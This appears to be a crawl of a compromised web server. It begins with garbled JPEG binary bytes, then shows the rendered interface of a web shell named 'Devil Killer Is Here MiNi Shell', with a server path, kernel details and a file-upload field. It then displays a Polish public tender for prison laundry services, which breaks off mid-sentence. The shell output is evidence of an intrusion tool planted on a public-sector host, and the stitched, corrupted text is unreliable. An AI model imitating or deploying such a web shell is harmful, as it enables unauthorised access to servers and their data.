JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20240424/0029970201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa prania świadczona dla Zakładu Karnego w Czerwonym Borze oraz jego Oddziału Zewnętrznego w Grądach-Woniecku. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Karny</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">ZK Czerwony Bór</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 451095215</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Czerwony Bór 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łomża</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">18-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL842 - Łomżyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zk_czerwony_bor@sw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sw.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa prania świadczona dla Zakładu Karnego w Czerwonym Borze oraz jego Oddziału Zewnętrznego w Grądach-Woniecku. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2c0376f3-0223-11ef-b81b-aebd110f5279</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00299702</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00238922/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługi prania dla Zakładu Karnego w Czerwonym Borze oraz Oddziału Zewnętrznego w Grądach-Woniecku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-2c0376f3-0223-11ef-b81b-aebd110f5279 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja pomiędzy Zamawiającym a Wykonawcami, w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji (innych niż oferta Wykonawcy), odbywa się przy użyciu środków<br/>komunikacji elektronicznej, za pomocą poczty elektronicznej: zk_czerwony_bor@sw.gov.pl i https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na https://ezamowienia.gov.pl.<br/>Wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej, zostały opisane na stronie https://ezamowienia.gov.pl. Sposób sporządzenia, wysyłania i odbierania korespondencji elektronicznej musi być zgodny z wymaganiami określonymi w rozporządzeniu wydanym na podstawie art. 70 PZP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego<br/>i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych<br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (dalej: RODO) informuję, że:<br/>administratorem danych osobowych w zakresie dokumentowania jest: Dyrektor Zakładu Karnego w Czerwonym Borze z siedzibą<br/>Czerwony Bór 2, 18-400 Łomża, e-mail: zk_czerwony_bor@sw.gov.pl, tel. 86 215 35 83.<br/>dane kontaktowe inspektora ochrony danych: iod_zk_czerwony_bor@sw.gov.pl, tel. 862764860.<br/>Cel i podstawy przetwarzania<br/>Państwa dane będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego. Podstawą prawną ich<br/>przetwarzania jest Państwa zgoda wyrażona poprzez akt uczestnictwa w postępowaniu oraz następujące przepisy prawa:<br/>ustawy z dnia 11 września 2019 (Dz.U. z 2023 r. poz. 1605) – Prawa zamówień publicznych;<br/>rozporządzenia Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakie może żądać zamawiający od<br/>wykonawcy w postępowaniu o udzielenie zamówienia;<br/>ustawy z dnia 13 grudnia 2019 r. o narodowym zasobie archiwalnym i archiwach (Dz.U. z 2020 r. poz. 164);<br/>art. 6 ust. 1 lit. b i c Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r.<br/>w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (dalej: RODO).<br/>Prawa osób, których dane dotyczą<br/>W odniesieniu do danych pozyskanych w związku z prowadzonym postępowaniem o udzielenie zamówienia publicznego przysługują<br/>Państwu następujące uprawnienia:<br/>prawo dostępu do swoich danych oraz otrzymania ich kopii;<br/>prawo do sprostowania (poprawiania) swoich danych;<br/>prawo do ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania<br/>z tego prawa;<br/>prawo do wniesienia skargi do Prezesa UODO (z siedzibą w Warszawie, przy ul. Stawki 2, 00-193 Warszawa, więcej szczegółów<br/>na stronie internetowej: https://uodo.gov.pl/) – w przypadku, gdy przetwarzanie danych osobowych narusza przepisy dotyczące<br/>ochrony danych osobowych.<br/>Okres przechowywania danych<br/>Państwa dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego przetwarzane będą przez okres 5 lat:<br/>od dnia zakończenia postępowania o udzielenie zamówienia.<br/>Odbiorcy danych osobowych<br/>Państwa dane pozyskane w związku z postępowaniem o udzielenie zamówień publicznego przekazywane będę wszystkim<br/>zainteresowanym podmiotom i osobom, gdyż co do zasady postępowanie o udzielenie zamówienia publicznego jest jawne.<br/>Ograniczenie dostępu Państwa danych o których mowa wyżej może wystąpić jedynie w szczególnych przypadkach jeśli jest to<br/>uzasadnione ochroną prywatności zgodnie z art. 8 ust. 4 pkt 1 i 2 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych.<br/>Ponadto odbiorcą danych zawartych w dokumentach związanych z postępowaniem o zamówienie publiczne mogą być podmioty z<br/>którymi Zakład Karny w Czerwonym Borze zawarł umowy lub porozumienia na korzystanie z udostępnianych przez nie usług w<br/>zakresie przekazywania lub archiwizowania danych. Zakres przekazania danych tym odbiorcom ograniczony jest jednak wyłącznie<br/>do możliwości zapoznania się z tymi danymi w związku ze świadczeniem usług. Odbiorców tych obowiązuje klauzula zachowania poufności pozyskanych w takich okolicznościach wszelkich danych, w tym danych osobowych.<br/>Państwa trzecie<br/>Administrator Danych Osobowych nie będzie przekazywać Pana/Pani danych osobowych do państwa trzeciego lub organizacji<br/>międzynarodowej</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DKW.2232.5.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie usług pralniczych tj. prania, dezynfekcji, maglowania i prasowania, zgodnie z zapotrzebowaniem i na rzecz Zamawiającego - Zakładu Karnego w Czerwonym Borze oraz jego Oddziału Zewnętrznego w Grądach-Woniecku w ilości około 85000 kg. Odnośnie wykonania usługi prania Wykonawca zobowiązany jest zachować następujące parametry usługi:<br/>1) usługa obejmuje pranie wodne wraz z pełnym wykończeniem, pod pojęciem którego Zamawiający rozumie również: maglowanie lub prasowanie w zależności od rodzaju asortymentu, dezynfekcję, krochmalenie, drobne naprawy typu obszycia oderwanych brzegów materiału, podszycie kieszeni, podszewek, przyszycie tasiemek lub guzików, cerowanie rozdarć, itp.<br/>2) pakowanie wypranych rzeczy posegregowanych według asortymentu w folię, worki lub pojemniki <br/>3) oznakowanie opakowania w sposób umożliwiający rozpoznanie rodzaju asortymentu oraz jego ilości<br/>4) zapewnienia Zamawiającemu worków do transportu i przenoszenia powyższego asortymentu <br/>5) Wykonawca zobowiązuje się do należytego wykonania usługi będącej przedmiotem umowy zgodnie z normami sanitarnymi i epidemiologicznymi oraz przepisami przyjętymi w tym zakresie przy praniu odzieży, w tym również odzieży skażonej biologicznie.<br/>Wykonawca zobowiązuje się odbierać od Zamawiającego asortyment przeznaczony do prania własnym transportem oraz na własny koszt minimum:<br/>•	Zakład Karny w Czerwonym Borze: dwa razy w tygodniu w godz.: 8:00-14:00<br/>•	Oddział Zewnętrzny w Grądach-Woniecku: jeden raz w tygodniu w godz.: 8:00-14:00. Rzeczy przekazane do prania w dany dzień Wykonawca zwraca po upraniu w następny wyznaczony dzień. W trakcie zdawania i odbioru towaru w siedzibie Zamawiającego następować będzie ważenie i przeliczanie towaru przekazywanego i odbieranego z prania w obecności upoważnionych przedstawicieli stron, za pokwitowaniem na ustalonym przez obie strony dowodzie odbioru.<br/>miejsce odbioru:<br/>•	Zakład Karny w Czerwonym Borze, Czerwony Bór 2, 18-400 Łomża<br/>•	Oddział Zewnętrzny w Grądach-Woniecku, Grądy-Woniecko 34, 18-312 Rutki-Kossaki<br/>Zamawiający zastrzega sobie możliwość:<br/>1) zmiany ilości realizowanych usług<br/>2) niewyczerpania w okresie obowiązywania umowy zamawianych usług w całości, przy czym będzie to wielkość nie mniejsza niż 60 % wielkości całego zamówienia. W związku ze zmniejszeniem łącznej ilości zamówień maksymalnie do 60 %, Zamawiający nie poniesie żadnej odpowiedzialności.<br/>3) w przypadku zmiany ilości realizowanych usług w poszczególnych pozycjach tabeli z pkt. 2, Zamawiający pokryje jedynie koszty związane z faktycznie wykonaną usługą. <br/>Zamawiający za okres rozliczeniowy do fakturowania uznaje miesiąc kalendarzowy. Rzeczywiste wynagrodzenie Wykonawcy będzie obliczane jako iloczyn ilości usług zrealizowanych w zakończonym okresie rozliczeniowym oraz opłaty jednostkowej za 1 kg prania określony w formularzu ofertowym.<br/>Termin płatności wynagrodzenia należnego Wykonawcy wynosi 30 dni od daty dostarczenia prawidłowo wystawionej faktury do siedziby Zamawiającego.<br/>Zamawiający w terminie 7 dni licząc od dnia dostawy wypranych rzeczy ma prawo reklamować przedmiot zamówienia.<br/>Na rozpatrzenie reklamacji Wykonawca ma maksymalnie 2 dni.<br/>W przypadku uznania reklamacji Wykonawca w ciągu maksymalnie 5 dni usunie zgłoszone nieprawidłowości poprzez uzupełnienie dostawy wypranych rzeczy w przypadku rozbieżności w ilości lub wykona usługę ponownie w przypadku zakwestionowania jakości.<br/>W przypadku zniszczenia lub zagubienia rzeczy Wykonawca zobowiązany jest do pokrycia uzasadnionych kosztów odtworzenia zagubionego lub zniszczonego przedmiotu. <br/>Reklamacje Zamawiający będzie zgłaszał telefonicznie, faksem lub e mailem za potwierdzeniem, do osoby wskazanej przez Wykonawcę<br/>Brak odpowiedzi przez Wykonawcę na złożoną reklamację w ciągu 2 dni od dnia jej otrzymania przyjmuje się za uznanie reklamacji. <br/>Rodzaj i ilość asortymentu określona przez Zamawiającego w powyższej tabeli w pkt 2 ma charakter szacunkowy, określony na podstawie analizy potrzeb i służy jako podstawa do wyliczenia ceny. Rodzaj i ilość asortymentu w ramach świadczonej usługi prania będzie ulegał zmianie w zależności od potrzeb Zamawiającego na co Wykonawca wyraża zgodę i nie będzie dochodził roszczeń z tytułu zmian ilościowych i rodzajowych w trakcie realizacji przedmiotu zamówienia. Usługa prania każdego z asortymentu wymienionego w tabeli w pkt. 2 musi być dostępna dla Zamawiającego. <br/>Zamawiający ma prawo zlecić usługę innemu podmiotowi, a kosztami realizacji obciążyć Wykonawcę, jeżeli Wykonawca nie odbierze od Zamawiającego w wyznaczonym dniu i czasie asortymentu przeznaczonego do prania. <br/>Wymagania, o których mowa w art. 95 ust. 1 Prawo zamówień publicznych (Wymóg zatrudnienia na podstawie stosunku pracy)<br/>Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez wykonawcę lub podwykonawcę co najmniej jednej osoby lub więcej osób wykonujących czynności obsługa pralnicy i prasowanie lub odbiór i dowóz przedmiotu zamówienia na czas realizacji zamówienia.<br/>W trakcie realizacji zamówienia zamawiający uprawniony jest do wykonywania czynności kontrolnych wobec wykonawcy odnośnie spełniania przez wykonawcę lub podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących czynności. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98310000-9 - Usługi prania i czyszczenia na sucho</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punktowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">: Zatrudnienie do realizacji zamówienia osób społecznie marginalizowanych o których mowa w art. 94 ust. 1 pkt 5</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu;<br/>2) spełniają warunki udziału w postępowaniu określone przez zamawiającego w ogłoszeniu o zamówieniu i SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Na potwierdzenie wykazania<br/>braku podstaw wykluczenia z postępowania o udzielenie zamówienia w okolicznościach, o których stanowi art. 108 ust. 1 i art. 109<br/>ust. 1 pkt 4 ustawy Pzp, oraz w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego wykonawca składa do oferty<br/>oświadczenie o niepodleganiu wykluczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający może wezwać<br/>wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia<br/>wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych potwierdzających: 1) spełnianie<br/>warunków udziału w postępowaniu: odpis lub informacja z Krajowego Rejestru Sądowego lub z<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli<br/>odrębne przepisy wymagają wpisu do rejestru lub ewidencji; 2) brak podstaw wykluczenia: a) oświadczenie wykonawcy o aktualności<br/>informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania<br/>wskazanych przez zamawiającego. b) oświadczenia wykonawcy o braku przynależności do tej samej grupy kapitałowej, z innym wykonawcą, który złożył odrębną ofertę – załącznik nr 4 do SWZ 3) 2. Zamawiający nie wezwie wykonawcy do złożenia<br/>podmiotowych środków dowodowych, jeżeli: 1) może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w<br/>szczególności rejestrów publicznych w rozumieniu ustawy z 17.2.2005 r. o informatyzacji działalności podmiotów realizujących<br/>zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp, dane umożliwiające dostęp do<br/>tych środków; 2) podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi oświadczenia, o którym<br/>mowa w art. 125 ust. 1 Pzp. 3. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>Zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność. 4. Jeżeli zachodzą<br/>uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki dowodowe nie są już aktualne, Zamawiający może w<br/>każdym czasie wezwać wykonawcę lub wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych,<br/>aktualnych na dzień ich złożenia. 5. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej<br/>Polskiej zamiast dokumentów, o których mowa w ust. 2, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę<br/>lub miejsce zamieszkania, potwierdzające odpowiednio, że: a) nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego aktywami<br/>nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje<br/>się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury –<br/>wystawiony nie wcześniej niż 3 miesiące przed ich złożeniem; 6. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 1, zastępuje się je odpowiednio w całości lub w części<br/>dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego<br/>reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym<br/>wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem<br/>sądowym lub administracyjnym, notariuszem, organem administracyjnym, 